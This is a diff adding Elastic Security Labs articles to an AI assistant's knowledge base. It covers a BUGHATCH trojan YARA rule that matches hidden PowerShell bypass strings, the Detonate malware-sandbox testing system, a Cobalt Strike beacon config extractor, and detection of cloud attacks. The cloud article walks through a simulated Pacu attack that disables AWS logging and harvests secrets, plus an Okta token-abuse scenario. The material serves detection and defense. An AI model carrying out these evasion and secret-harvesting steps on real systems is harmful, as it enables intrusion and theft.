+- [Command and Scripting Interpreter: Windows Command Shell](https://attack.mitre.org/techniques/T1059/003/)
+- [Encrypted Channel: Asymmetric Cryptography](https://attack.mitre.org/techniques/T1573/002/)
+- [Encrypted Channel: Symmetric Cryptography](https://attack.mitre.org/techniques/T1573/001/)
+- [Exfiltration Over C2 Channel](https://attack.mitre.org/techniques/T1041/)
+- [Automated Collection](https://attack.mitre.org/techniques/T1119/)
+- [Native API](https://attack.mitre.org/techniques/T1106/)
+
+## Detections
+
+### Detection rules
+
+The following detection rule was observed during the analysis of the BUGHATCH sample. This rule is not exclusive to BUGHATCH activity.
+
+- [Enumeration of Privileged Local Groups Membership](https://www.elastic.co/guide/en/security/current/enumeration-of-privileged-local-groups-membership.html#enumeration-of-privileged-local-groups-membership)
+
+### YARA rule
+
+Elastic Security has created a [YARA rule](https://github.com/elastic/protections-artifacts/blob/main/yara/rules/Windows_Trojan_Bughatch.yar) to identify this activity.
+
+```
+rule Windows_Trojan_BUGHATCH {
+    meta:
+        author = “Elastic Security”
+        creation_date = "2022-05-09"
+        last_modified = "2022-06-09"
+        license = “Elastic License v2”
+        os = "Windows"
+        arch = "x86"
+        category_type = "Trojan"
+        family = "BUGHATCH"
+        threat_name = "Windows.Trojan.BUGHATCH"
+        reference_sample = "b495456a2239f3ba48e43ef295d6c00066473d6a7991051e1705a48746e8051f"
+
+    strings:
+    $a1 = { 8B 45 ?? 33 D2 B9 A7 00 00 00 F7 F1 85 D2 75 ?? B8 01 00 00 00 EB 33 C0 }
+    $a2 = { 8B 45 ?? 0F B7 48 04 81 F9 64 86 00 00 75 3B 8B 55 ?? 0F B7 42 16 25 00 20 00 00 ?? ?? B8 06 00 00 00 EB ?? }
+    $a3 = { 69 4D 10 FD 43 03 00 81 C1 C3 9E 26 00 89 4D 10 8B 55 FC 8B 45 F8 0F B7 0C 50 8B 55 10 C1 EA 10 81 E2 FF FF 00 00 33 CA 8B 45 FC 8B 55 F8 66 89 0C 42 }
+     $c1 = "-windowstyle hidden -executionpolicy bypass -file"
+     $c2 = "C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe"
+     $c3 = "ReflectiveLoader"
+     $c4 = "\\Sysnative\\"
+     $c5 = "TEMP%u.CMD"
+     $c6 = "TEMP%u.PS1"
+     $c7 = "\\TEMP%d.%s"
+     $c8 = "NtSetContextThread"
+     $c9 = "NtResumeThread"
+
+    condition:
+        any of ($a*) or 6 of ($c*)
+}
+```
diff --git a/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/callout_example.md b/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/callout_example.md
new file mode 100644
index 0000000000000..6ca57349245c6
--- /dev/null
+++ b/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/callout_example.md
@@ -0,0 +1,31 @@
+---
+title: "Callout example"
+slug: "callout-example"
+date: "1883-1-1"
+description: "This is an article with callout examples."
+author:
+  - slug: andrew-pease
+image: "../../security-labs-thumbnail.png"
+category:
+  - slug: reports
+---
+
+<Callout type="info" title="This is an info callout.">
+  The content for the callout goes here. It can have **bold** or *italic* text,
+  and can also include [links](https://www.elastic.co) if needed.
+</Callout>
+
+<Callout type="warning" title="This is a warning callout.">
+  The content for the callout goes here. It can have **bold** or *italic* text,
+  and can also include [links](https://www.elastic.co) if needed.
+</Callout>
+
+<Callout type="success" title="This is a success callout.">
+  The content for the callout goes here. It can have **bold** or *italic* text,
+  and can also include [links](https://www.elastic.co) if needed.
+</Callout>
+
+<Callout type="danger" title="This is an danger callout.">
+  The content for the callout goes here. It can have **bold** or *italic* text,
+  and can also include [links](https://www.elastic.co) if needed.
+</Callout>
diff --git a/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/click_click_boom_automating_protections_testing_with_detonate.md b/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/click_click_boom_automating_protections_testing_with_detonate.md
new file mode 100644
index 0000000000000..ed971a348128f
--- /dev/null
+++ b/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/click_click_boom_automating_protections_testing_with_detonate.md
@@ -0,0 +1,67 @@
+---
+title: "Click, Click… Boom! Automating Protections Testing with Detonate"
+slug: "click-click-boom-automating-protections-testing-with-detonate"
+date: "2023-05-04"
+description: "To automate this process and test our protections at scale, we built Detonate, a system that is used by security research engineers to measure the efficacy of our Elastic Security solution in an automated fashion."
+author:
+  - slug: jessica-david
+  - slug: hez-carty
+  - slug: sergey-polzunov
+image: "blog-thumb-tools-various.jpg"
+category:
+  - slug: tools
+  - slug: security-research
+  - slug: detection-science
+tags:
+  - detonate
+---
+
+## Preamble
+
+Imagine you are an Endpoint artifact developer. After you put in the work to ensure protection against conventional shellcode injections or ransomware innovations, how do you know it actually works before you send it out into the world?
+
+First, you set up your end-to-end system, which involves setting up several services, the infrastructure, network configuration, and more. Then, you run some malware; the data you collect answers questions about performance and efficacy, and may be an important research resource in the future. After you spend a day testing and gathering your results, you may want to run several hundred hashes over multiple kinds of operating systems and machine types, a daunting task if done entirely manually.
+
+To automate this process and test our protections at scale, we built Detonate, a system that is used by security research engineers to measure the efficacy of our Elastic Security solution in an automated fashion. Our goal is to have it take security researchers only a couple of clicks to test our protections against malware. (Thus: click, click… boom!)
+
+In this series of posts, we’ll: - Introduce Detonate and why we built it - Explore how Detonate works and the technical implementation details - Describe case studies on how our teams use it at Elastic - Discuss opening our efficacy testing to the community to help the world protect their data from attack
+
+Interested in other posts on Detonate? Check out [Part 2 - Into The Weeds: How We Run Detonate](https://www.elastic.co/security-labs/into-the-weeds-how-we-run-detonate) where we break down how Detonate works and dive deeper into the technical implementation.
+
+## What is Detonate?
+
+At a high level, Detonate runs malware and other potentially malicious software in a controlled (i.e., sandboxed) environment where the full suite of Elastic Security capabilities are enabled. Detonate accepts a file hash (usually a SHA256) and performs the following actions:
+
+- Prepares all files needed for detonation, including the malicious file
+- Provisions a virtual machine (VM) instance in a sandboxed environment, with limited connectivity to the outside world
+- Waits until file execution completes; this happens when, for example, an execution result file is found or the VM instance is stopped or older than a task timeout
+- Stops the running VM instance (if necessary) and cleans up the sandboxed environment
+- Generates an event summary based on telemetry and alerts produced during detonation
+
+The results of these detonations are made available to the team for research and development purposes. By post-processing the logs, events, and alerts collected during detonation, we can enrich them with third-party intelligence and other sources to evaluate the efficacy of new and existing Elastic Security protection features.
+
+## What does it help us with?
+
+### Measuring Efficacy
+
+To build the best EPP on the market, we have to continuously measure the effectiveness of our product against the latest threats. Detonate is used to execute many tens of thousands of samples every month from our data feeds. Gaps in coverage are automatically identified and used to prioritize improvements to our protections.
+
+### Supporting existing protections
+
+Many of our protections have associated artifacts (such as machine learning models and rule definitions) which receive regular updates. These updates need testing to ensure we identify and remediate regressions before they end up in a user’s environment.
+
+Detonate provides a framework and suite of tools to automate the analysis involved in this testing process. By leveraging a corpus of hashes with known good and bad software, we can validate our protections before they are deployed to users.
+
+### Threat research
+
+Some of our security researchers scour the internet daily for new and emerging threats. By giving them an easy-to-use platform to test malicious software they find in the wild, we better understand how Elastic Security defends against those threats or if we need to update our protections.
+
+### Evaluating new protections
+
+In addition to testing existing protections, new protections run the risk of adverse interactions with our existing suite of layered capabilities. A new protection may be easily tested on its own, but tests may hide unintended interactions or conflicts with existing protections. Detonate provides a way for us to customize the configuration of the Elastic Stack and individual protections to more easily find and identify such conflicts earlier in development.
+
+## What’s next?
+
+In this publication, we introduced Detonate & what we use it for at Elastic. We discussed the benefits it provides our team when assessing the performance of our security artifacts.
+
+Now that you know what it is, we will break down how Detonate works. In our next post, we’ll dive deeper into the technical implementation of Detonate and how we’re able to create this sandboxed environment in practice.
diff --git a/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/cloud_monitoring_and_detection_with_elastic_security.md b/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/cloud_monitoring_and_detection_with_elastic_security.md
new file mode 100644
index 0000000000000..3ce3719c061ec
--- /dev/null
+++ b/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/cloud_monitoring_and_detection_with_elastic_security.md
@@ -0,0 +1,193 @@
+---
+title: "Security operations: Cloud monitoring and detection with Elastic Security"
+slug: "cloud-monitoring-and-detection-with-elastic-security"
+date: "2022-11-30"
+description: "As companies migrate to cloud, so too do opportunist adversaries. That's why our Elastic Security team members have created free detection rules for protecting users' cloud platforms like AWS and Okta. Learn more in this blog post."
+author:
+  - slug: brent-murphy
+  - slug: david-french
+  - slug: elastic-security-intelligence-analytics-team
+image: "blog-thumb-network-attack-map.jpg"
+category:
+---
+
+As many organizations have migrated their infrastructure, applications, and data to cloud offerings, adversaries have extended their operational capabilities in cloud environments to achieve their mission — whether that means stealing intellectual property, disrupting business operations, or holding an organization's data for ransom. In order to protect our users' data from attack, the Elastic Security Intelligence & Analytics Team researches and develops [rules](https://www.elastic.co/blog/elastic-security-opens-public-detection-rules-repo) to detect attacker behavior in the cloud _and_ on the endpoint.
+
+In this post, we'll discuss cloud monitoring and detection-related challenges security operations teams face, and why attacks against cloud environments are often successful. We will share details on our free cloud detection rules (including many new ones released in [Elastic Security 7.9](https://www.elastic.co/blog/whats-new-elastic-security-7-9-0-free-endpoint-security)) and show how they can help [Elastic Security](https://www.elastic.co/security) users.
+
+We'll also explain how Elastic can ingest logs from a wide variety of cloud platforms and how the Elastic Common Schema (ECS) makes searching, monitoring, and detection easy for defenders.
+
+## Cloud monitoring and detection challenges
+
+Security teams typically encounter one or more of the following challenges when they're asked to monitor, detect, and respond to threats in their organization's cloud environments:
+
+- **Resource constraints:** It can take a considerable amount of time to learn and understand cloud technologies and their ever-changing data sources. Many security operations teams do not have the resources to allocate to this ongoing effort.
+- **Understanding of adversary tradecraft:** Attacker behavior on well-known platforms such as Windows has been researched extensively and shared with the security community. Security teams may not have an in-depth understanding of how adversaries operate in cloud environments or the ability to provision a test environment to practice offensive and defensive techniques to protect their organization.
+- **Blind spots:** For effective monitoring and detection, the data available to security practitioners must be relevant, accurate, and timely. Cloud logs shipped to a SIEM can be used for detection and response as long as the security team can depend on the quality of the data.
+- **Data normalization:** Most cloud platforms have their own log categories and event schema. Normalizing logs into a common schema is not a trivial or one-off task. Some security teams, for example, have several different field names for a hostname across their data sources indexed in their SIEM. Without a normalized and documented schema, it can be difficult for analysts — especially less experienced ones — to write search queries and correlate events across data sources effectively.
+
+## Ingesting and searching cloud logs with Elastic
+
+Elastic has a large collection of Filebeat [modules](https://www.elastic.co/guide/en/beats/filebeat/current/filebeat-modules.html) that can be used to simplify the collection, parsing, and visualization of many diverse log formats into a common schema — including cloud platforms such as [Amazon Web Services (AWS)](https://www.elastic.co/guide/en/beats/filebeat/current/filebeat-module-aws.html), [Azure](https://www.elastic.co/guide/en/beats/filebeat/current/filebeat-module-azure.html), [Okta](https://www.elastic.co/guide/en/beats/filebeat/current/filebeat-module-okta.html), and [Office 365](https://www.elastic.co/guide/en/beats/filebeat/current/filebeat-module-o365.html). Rapid development of new Filebeat modules is an ongoing process.
+
+The [Elastic Common Schema](https://www.elastic.co/guide/en/ecs/current/ecs-reference.html) (ECS) defines a common set of fields for ingesting logs from a connected data source (e.g., AWS/Okta) into Elasticsearch. Log data is normalized into a format where the various field names can be used in queries to correlate behavior across data sources. This is useful to security and IT operations teams for a number of reasons.
+
+Practitioners and administrators do not need to spend countless hours transforming or normalizing their ingested logs so that the field names follow their own common schema. Managing a schema like this yourself is no small undertaking and is a continuous effort. Elastic manages ECS (saving users time and resources) so that security teams can rely on a common set of field names to search their data quickly and efficiently.
+
+End users can rely on using the same field names in their queries when searching across multiple data sources, which presents the following advantages:
+
+- Having a consistent schema for searching saves security analysts time and lowers the barrier to entry for new analysts. Analysts don't have to learn or remember all of the different field names and their purpose for each data source.
+- Analysts can correlate events across data sources such as endpoint, proxy, and firewall, which helps them ask questions of their data more efficiently and make sound decisions during an investigation, incident, or hunt.
+- It's easy for analysts to produce a timeline or build a visualization of the activity that occurred.
+
+## Detecting attackers operating in cloud environments
+
+The Elastic Security Intelligence & Analytics Team's research into adversary tradecraft leads to new detection features like rules and machine learning jobs — capabilities that enable small security teams to have an outsized impact. Security features like these increase the cost of an attack for adversaries. Elastic Security users can expect to see a continued focus on increasing the cost of cloud attacks.
+
+In the remainder of this blog post, we'll simulate attack techniques against AWS and Okta cloud environments. We'll review the alerts that are generated by the suspicious activity and how an analyst can perform initial triage and complete their investigation using Elastic Security. We will also demonstrate how analysts can add exceptions to detection rules in order to filter benign events and continue to alert on suspicious behavior.
+
+## Monitoring AWS CloudTrail logs to detect suspicious behavior
+
+As organizations migrate to or provision new infrastructure in cloud platforms like AWS, they face the common challenges that we described earlier. Fortunately, Elastic Security has a [strong variety of AWS rules](https://github.com/elastic/detection-rules/tree/main/rules/aws), available for [free in 7.9](https://www.elastic.co/blog/whats-new-elastic-security-7-9-0-free-endpoint-security) to detect suspicious behaviors in an AWS environment.
+
+The Filebeat [module](https://www.elastic.co/guide/en/beats/filebeat/master/filebeat-module-aws.html) for AWS helps you easily ship CloudTrail, Simple Storage Service (S3), Elastic Load Balancing (ELB), and virtual private cloud (VPC) flow logs to Elasticsearch for monitoring and detection in Elastic Security. Let's walk through an attack and defense scenario utilizing CloudTrail data. [CloudTrail](https://aws.amazon.com/cloudtrail/) provides event history of your AWS account activity, including actions taken through the AWS Management Console, AWS software development kits (SDKs), command line tools, and other AWS services. This event history can help simplify security detection, analysis, and investigations.
+
+Many attacks against AWS start with an attacker obtaining an access key and/or the secret access key details. These keys may be harvested in a variety of ways, including through phishing, a data breach, GitHub repositories, screenshots, error messages, snapshot data, or simply poor key management practices. By obtaining these keys, an attacker can take a variety of actions against your AWS infrastructure.
+
+Let's walk through one of the many potential attack scenarios that could play out. In the following example, the adversary enumerates the trails and monitoring capabilities that have been configured for the AWS account. They follow up on this activity by disabling a trail and a configuration recorder in an attempt to evade detections and then proceed to harvest secrets.
+
+### Simulating adversary behavior in AWS
+
+In this demonstration, we'll use [Pacu](https://github.com/RhinoSecurityLabs/pacu) to perform our attack. Pacu is a popular framework for exploiting AWS infrastructure, developed and maintained by Rhino Security Labs. Pacu is modular, similar to other exploitation frameworks like Metasploit and Koadic, and enables attackers to exploit configuration flaws within an AWS account. Attackers can use Pacu to check if the required permissions are assigned to the compromised account before attempting to execute a module. This can be helpful from an attacker's perspective to not create unnecessary noise and logs, and draw additional attention from defenders by running modules that will ultimately fail.
+
+The attacker begins by enumerating services using the detection\_\_enum_services module to determine what logging and monitoring services are enabled for the AWS account.
+
+![Figure 1 - Enumerating services using Pacu’s detection__enum_services module ](/assets/images/cloud-monitoring-and-detection-with-elastic-security/1-enumerating-services-blog-secops-cloud-platform-monitoring.jpg)
+
+The attacker discovered eight trails, as well as ten configuration rules, a recorder, and a delivery channel. Essentially, the enumeration script is querying certain AWS API calls to list or describe relevant information about the environment. By reviewing the [code](https://github.com/RhinoSecurityLabs/pacu/blob/master/modules/detection__enum_services/main.py) of the module, we can see the targeted APIs:
+
+```
+DescribeSubscription
+GetSubscriptionState
+DescribeTrails
+ListDetectors
+DescribeConfigRules
+DescribeConfigurationRecorders
+DescribeConfigurationRecorderStatus
+DescribeDeliveryChannels
+DescribeDeliveryChannelStatus
+DescribeConfigurationAggregators
+DescribeAlarms
+DescribeFlowLogs
+```
+
+After the attacker determines which services are running, their next logical step may be to interrupt logging and monitoring by disabling a trail, alarm, detector, or recorder in an attempt to evade detection. To accomplish this objective, we'll use a different module called detection\_\_disruption to disable a trail called brentlog, and stop the configuration recorder named default.
+
+![Figure 2 - Disabling a trail and stopping a configuration recorder using Pacu’s detection__disruption module ](/assets/images/cloud-monitoring-and-detection-with-elastic-security/2-disabling-trail-blog-secops-cloud-platform-monitoring.jpg)
+
+At this point, with trail logging suspended and the configuration recorder turned off from tracking changes to resources, the attacker may want to check if there are any credentials, API keys, or tokens available in [Secrets Manager](https://aws.amazon.com/about-aws/whats-new/2018/04/introducing-aws-secrets-manager/#:~:text=AWS%20Secrets%20Manager%20is%20a,other%20secrets%20throughout%20their%20lifecycle.) and if so, collect them. In this scenario, the attacker uses the enum_secrets module and finds one secret in the directory, /sessions/brent/downloads/secrets/secrets_manager. Harvesting these secrets could help the adversary achieve lateral movement and/or privilege escalation.
+
+![Figure 3 - Searching for AWS secrets using Pacu's enum__secrets module](/assets/images/cloud-monitoring-and-detection-with-elastic-security/3-searching-aws-blog-secops-cloud-platform-monitoring.jpg)
+
+![Figure 4 - Viewing the AWS secret after its discovery](/assets/images/cloud-monitoring-and-detection-with-elastic-security/4-viewing-aws-blog-secops-cloud-platform-monitoring.jpg)
+
+We'll stop our fictitious attack scenario here, but if you're curious to learn what the attacker could do next, the following Google search will return some examples: intitle:"AWS" intext:("attack" | "breach"). In the next section, we'll look at what this behavior looks like from a defender's perspective and how Elastic Security can be used to detect this behavior.
+
+### Detecting and investigating the suspicious behavior in AWS
+
+While monitoring the usage of the previously mentioned APIs, it can be difficult to distinguish benign activity from suspicious behavior, such as an attacker enumerating an environment. In production environments, monitoring for calls to these APIs can be noisy, as the behavior is quite common. To help find this rare and potentially suspicious behavior, and in addition to the AWS detection rules we have available, we've released [machine learning](https://github.com/elastic/detection-rules/tree/main/rules/ml) jobs in 7.9 specifically for AWS CloudTrail that help identify outliers, such as patterns of unusual activity that are hard to find using conventional detection rules.
+
+Looking at our detections page from the previous attack, we can see multiple alerts were triggered. Our free built-in detection rules identified the techniques of _suspending a trail_, _stopping a configuration recorder_, and _grabbing sensitive information from the secrets manager_. The other alerts are from the machine learning jobs of [_Unusual Country For an AWS Command_](https://www.elastic.co/guide/en/security/7.9/unusual-city-for-an-aws-command.html) and [_Unusual AWS Command for a User_](https://www.elastic.co/guide/en/security/master/unusual-aws-command-for-a-user.html) which identify a geolocation (country) that is unusual for the command or a user context that does not normally use the command.
+
+![Figure 5 - Viewing the detection alerts in Elastic Security](/assets/images/cloud-monitoring-and-detection-with-elastic-security/5-viewing-detection-alerts-blog-secops-cloud-platform-monitoring.jpg)
+
+If we pivot into one of the machine learning alerts, we can see a description of what it detected, along with a built-in investigation guide to walk an analyst through a potential workflow when analyzing an unusual CloudTrail event.
+
+![Figure 6 - Viewing the details of a machine learning alert](/assets/images/cloud-monitoring-and-detection-with-elastic-security/6-machine-learning-alert-blog-secops-cloud-platform-monitoring.jpg)
+
+![Figure 7 - Viewing the investigation notes for an unusual CloudTrail event](/assets/images/cloud-monitoring-and-detection-with-elastic-security/7-viewing-investigation-notes-blog-secops-cloud-platform-monitoring.png)
+
+Let's also take a look at the details in the Timeline view from the [_AWS Configuration Recorder Stopped_](https://www.elastic.co/guide/en/security/master/aws-configuration-recorder-stopped.html) alert. The fields I'm particularly interested in are the API call, user agent string, user identity type, request parameters, and the raw text of the entire event.
+
+![Figure 8 - Analyzing the alert details in the Timeline](/assets/images/cloud-monitoring-and-detection-with-elastic-security/8-alert-details-timeline-blog-secops-cloud-platform-monitoring.png)
+
+By analyzing the alert, we're able to quickly determine:
+
+|                    |                                                                                                                                                                                                                                                      |
+| ------------------ | ---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- |
+| Field              | Description                                                                                                                                                                                                                                          |
+| event.action       | Tells us the AWS API call that was made, StopConfigurationRecorder                                                                                                                                                                                   |
+| request_parameters | Gives us the details about what was sent in the request, in our case, the configuration recorder name, default                                                                                                                                       |
+| user.name          | Informs us as to who made the request, pacu                                                                                                                                                                                                          |
+| user_identity.type | Contains details about the type of Identity and Access Management (IAM) identity. In our case, an IAMUser. Root is another user identity type we have built in rules for.                                                                            |
+| user_agent         | The value of the HTTP User-Agent header. User agent strings can be easily modified, but if an account typically uses the AWS Java SDK for their API calls, and it changes, then the detection of the anomalous user agent string can be a quick win. |
+| event.original     | Gives us the raw alert details                                                                                                                                                                                                                       |
+
+_Table 1 - Analysis of alert fields_
+
+After analyzing the alert, we can start to piece together the events and look at what actions the user took just before our alerts fired (and afterwards as applicable). Again, we can spot the attackers enumeration here as well.
+
+![Figure 9 - Viewing event history for the user Pacu in the Timeline ](/assets/images/cloud-monitoring-and-detection-with-elastic-security/9-event-history-blog-secops-cloud-platform-monitoring.png)
+
+We may also want to search our environment for specific API calls to see if they were invoked by other users or hosts, from different IPs, or at other time frames that would be suspicious in our environment.
+
+![Figure 10 - Viewing API call history for the StopConfigurationRecorder API in the Timeline ](/assets/images/cloud-monitoring-and-detection-with-elastic-security/10-api-history-blog-secops-cloud-platform-monitoring.png)
+
+We can also create a visualization to look for the least common API calls in our environment and pivot from there. For AWS, the API calls are in the event.action field.
+
+![Figure 11 - Using a visualization to look for least common API calls in our environment ](/assets/images/cloud-monitoring-and-detection-with-elastic-security/11-visualization-api-calls-blog-secops-cloud-platform-monitoring.png)
+
+As demonstrated, our free built-in rules for AWS can detect this activity as well as a number of other potential attack scenarios. We've opened up our [rules repository](https://github.com/elastic/detection-rules) and encourage you to have a look and learn how to [contribute](https://github.com/elastic/detection-rules#how-to-contribute) if interested.
+
+## Detecting suspicious behavior in Okta logs
+
+[Okta single sign-on (SSO)](https://www.okta.com/products/single-sign-on/) is a cloud solution that allows users to log into a variety of systems in their organization via a centralized process using a single user account. Informing end users that they only have to remember one username and password instead of ten or more reduces the risk that they'll adopt poor password hygiene and enables system administrators to enforce stronger password policies. Further, multi-factor authentication (MFA) policies can be configured in Okta, which raises the barriers to entry for attackers. Many attackers will simply move on to look for an easier target when they discover that MFA is enforced for their target's network or user account.
+
+While SSO solutions can provide a convenient user experience and reduce cybersecurity risk for an organization, these centralized systems that offer a type of skeleton key to many systems and applications are often an attractive target for attackers. For example, if an adversary manages to harvest an Okta administrator's credentials or API token, they could attempt to perform any of the actions in the non-exhaustive list below:
+
+- Modify or disable MFA policies for one or more applications in order to weaken their victim's security controls.
+- Create new user accounts or API tokens to maintain persistence in their target's environment and attempt to “blend in” and evade detection.
+- Modify, delete, or deactivate an Okta network zone to loosen the restrictions on which geolocation users or administrators can login from.
+- Delete or disable an application or other configuration to create a Denial-of-Service (DoS) condition and impact a company's business operations.
+
+To enable security teams to monitor their Okta environment for suspicious activity, our [Okta Filebeat module](https://www.elastic.co/guide/en/beats/filebeat/current/filebeat-module-okta.html) can pull [Okta System Log](https://developer.okta.com/docs/reference/api/system-log/) events and ship them to Elasticsearch to be indexed. Okta's System Log records events related to an organization in order to provide an audit trail that can be used to understand platform activity. The Elastic Security Intelligence & Analytics Team has [free rules](https://github.com/elastic/detection-rules/tree/main/rules/okta) to detect suspicious activity in Okta logs and will continue adding more in future.
+
+In the following example, imagine that an adversary has harvested an API token after gaining initial access to an organization's network. The API token has administrator privileges and the adversary executes some actions in their target's Oka environment:
+
+- Create a new user account and assign administrative permissions to it in order to maintain a presence in the target environment should the security team discover that the current API token is compromised
+- Deactivate a sign-on policy in order to weaken the target's security controls
+- Disable a network zone to enable attackers to authenticate from any geographical location during their intrusion
+
+The Okta Filebeat module was configured to ship Okta System Log events to Elasticsearch and our Okta rules were activated in Elastic Security. The suspicious activity triggered three alerts shown in Figure 12 below.
+
+![Figure 12 - Okta alerts in Elastic Security generated by suspicious activity](/assets/images/cloud-monitoring-and-detection-with-elastic-security/12-okta-alerts-blog-secops-cloud-platform-monitoring.png)
+
+Clicking on one of the alerts allows the analyst to review more information about the rule, including the description of the behavior that the rule detects, severity and risk scores, and the associated MITRE ATT&CK® tactic and technique. The analyst can scroll further down the page and begin to investigate the alert in Timeline.
+
+To learn more how Elastic supports ATT&CK, see our presentation: [How to Plan and Execute a Hunt](https://youtu.be/2Hh5spqA6bw).
+
+![Figure 13 - Viewing a rule's information and settings](/assets/images/cloud-monitoring-and-detection-with-elastic-security/13-rule-information-blog-secops-cloud-platform-monitoring.png)
+
+Security practitioners know that every organization's network is different. Behavior that looks suspicious in one environment may be benign in another. To help security teams find the proverbial “signal in the noise,” users can add exceptions to their detection rules to filter benign events and continue to alert on suspicious events. Figure 14 shows an exception being added to an Okta rule.
+
+![Figure 14 - Adding an exception to a rule in Elastic Security](/assets/images/cloud-monitoring-and-detection-with-elastic-security/14-adding-exception-blog-secops-cloud-platform-monitoring.jpg)
+
+We've also introduced the "threshold" rule type. Threshold rules aggregate query results and generate an alert when the number of matched events exceeds a certain threshold. The example rule below will generate an alert when 25 Okta user authentication failures occur from a single source IP address. This can be indicative of a brute force or password spraying attack.
+
+![Figure 15 - Reviewing a threshold rule configured to detect an Okta brute force attack](/assets/images/cloud-monitoring-and-detection-with-elastic-security/15-okta-brute-force-blog-secops-cloud-platform-monitoring.png)
+
+Viewing an alert generated by a threshold rule in the Timeline allows an analyst to review the events that triggered the rule and begin their triage process or investigation.
+
+![Figure 16 - Reviewing an alert from a failed Okta authentication threshold rule in Timeline](/assets/images/cloud-monitoring-and-detection-with-elastic-security/16-reviewing-alert-blog-secops-cloud-platform-monitoring.png)
+
+## Conclusion
+
+According to Verizon's latest [Data Breach Investigations Report](https://enterprise.verizon.com/resources/reports/dbir/), cloud assets were involved in 24% of the report's 3,950 data breaches reviewed last year. As organizations continue to migrate their data and business operations to the cloud, we can expect this number to increase.
+
+In this blog post, we discussed some of the challenges that security teams face when attempting to monitor for, detect, and investigate suspicious behavior in their organization's cloud environments. We walked through some practical examples on how attackers operate in cloud environments and how Elastic Security can detect those techniques.
+
+The Elastic Security Intelligence & Analytics Team researches adversary tradecraft and develops new detection rules and machine learning jobs for multiple platforms including cloud. Our users can expect to see our continued focus on increasing the cost of cloud attacks.
+
+Configuring our [Filebeat modules](https://www.elastic.co/guide/en/beats/filebeat/current/filebeat-modules.html) to ship logs to Elasticsearch and enable detection rules in Elastic Security is easy. Our [free detection rules](https://github.com/elastic/detection-rules) help security teams monitor those logs and detect suspicious behavior, regardless of the size of their team. Elastic Security enables analysts to triage and investigate those alerts quickly and efficiently.
+
+If you're interested in learning more about Elastic Security, you can [download it for free](https://www.elastic.co/security) or sign up for a free 14-day trial of [Elastic Cloud](https://www.elastic.co/cloud/).
diff --git a/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/cobalt_strike_beacon_extractor.md b/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/cobalt_strike_beacon_extractor.md
new file mode 100644
index 0000000000000..04a962656507c
--- /dev/null
+++ b/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/cobalt_strike_beacon_extractor.md
@@ -0,0 +1,125 @@
+---
+title: "Cobalt Strike Beacon Extractor"
+slug: "cobalt-strike-beacon-extractor"
+date: "2022-12-06"
+description: "Python script that collects Cobalt Strike memory data generated by security events from an Elasticsearch cluster, extracts the configuration from the CS beacon, and writes the data back to Elasticsearch."
+author:
+  - slug: elastic-security-labs
+image: "tools-image.jpg"
+category:
+  - slug: tools
+tags:
+  - cobaltstrike
+---
+
+Python script that collects Cobalt Strike memory data generated by security events from an Elasticsearch cluster, extracts the configuration from the CS beacon, and writes the data back to Elasticsearch.
+
+[Download cobalt-strike-extractor.tar.gz](https://assets.contentstack.io/v3/assets/bltefdd0b53724fa2ce/bltdbc4f9f2366d2f06/628829603b9b8554904a4ba2/cobalt-strike-extractor.tar.gz)
+
+## Overview
+
+This tool provides a Python module and command line tool that will search Elastic Endpoint alert data for detections of Cobalt Strike and the extracted memory data. When present, this tool will extract the implant configuration using the [cobaltstrike-config-extractor](https://github.com/strozfriedberg/cobaltstrike-config-extractor). The information is then normalized into an ECS-formatted JSON document and indexed into an Elasticsearch cluster or output to the terminal as JSON.
+
+> For help on creating Fleet policies to collect and analyze Cobalt Strike beacons in the Elastic Stack, check out our blog posts detailing this:
+>
+> - [Collecting Colbalt Strike beacons](https://www.elastic.co/security-labs/collecting-cobalt-strike-beacons-with-the-elastic-stack)
+> - [Extracting Cobalt Strike beacon configurations](https://www.elastic.co/security-labs/extracting-cobalt-strike-beacon-configurations)
+
+## Getting Started
+
+### Docker
+
+The recommended and easiest way to get going is to use Docker. From the directory this README is in, you can build a local container.
+
+```
+docker build . -t cobalt-strike-extractor
+```
+
+Next, make a copy of config.reference.yml and name it config.local.yml and edit for your environment. A minimal config looks like the example below. The input and output could use the same values, but you can optionally push it to a different cluster for analysis.
+
+```
+## Using an Elastic Cloud instance (this is a randomly generated example)
+input.elasticsearch:
+  enabled: True
+  cloud.id: security-cluster:dXMtd2VzdDEuZ2NwLmNsb3VkLmVzLmlvJGU0MWU1YTc3YmRjNzY2OTY0MDg2NjIzNDA5NzFjNjFkJDdlYjRlYTJkMzJkMTgzYTRiMmJkMjlkNTNjODhjMjQ4
+  cloud.auth: elastic:<PASSWORD>
+
+## Default output will use localhost:9092, see reference config
+output.elasticsearch:
+  enabled: True
+  username: elastic
+  password: <PASSWORD>
+
+```
+
+Now, run the container, passing in our local configuration. The -v flag here will add informational messages to the log output. Here, it tells us how many documents were successfully parsed and written.
+
+```
+docker run -ti --rm -v "$(pwd)/config.local.yml:/config.yml" \
+    cobalt-strike-extractor:latest -c /config.yml -v
+
+```
+
+_Output_:
+
+```
+[2022-01-10T21:33:31.493][INFO] Setting up input/output
+[2022-01-10T21:33:31.493][INFO] Connecting to Elasticsearch for input
+[2022-01-10T21:33:31.493][INFO] Successfully connected to Elasticsearch for input
+[2022-01-10T21:33:31.834][INFO] Connecting to Elasticsearch for output
+[2022-01-10T21:33:31.835][INFO] Successfully connected to Elasticsearch for output
+[2022-01-10T21:33:33.030][WARNING] Could not parse source as PE file (DOS Header magic not found.)
+[2022-01-10T21:33:33.078][WARNING] CobaltStrike Beacon config not found:
+[2022-01-10T21:33:33.093][WARNING] Could not parse source as PE file (DOS Header magic not found.)
+[2022-01-10T21:33:33.096][WARNING] CobaltStrike Beacon config not found:
+[2022-01-10T21:33:33.097][WARNING] Could not parse source as PE file (DOS Header magic not found.)
+[2022-01-10T21:33:33.097][WARNING] CobaltStrike Beacon config not found:
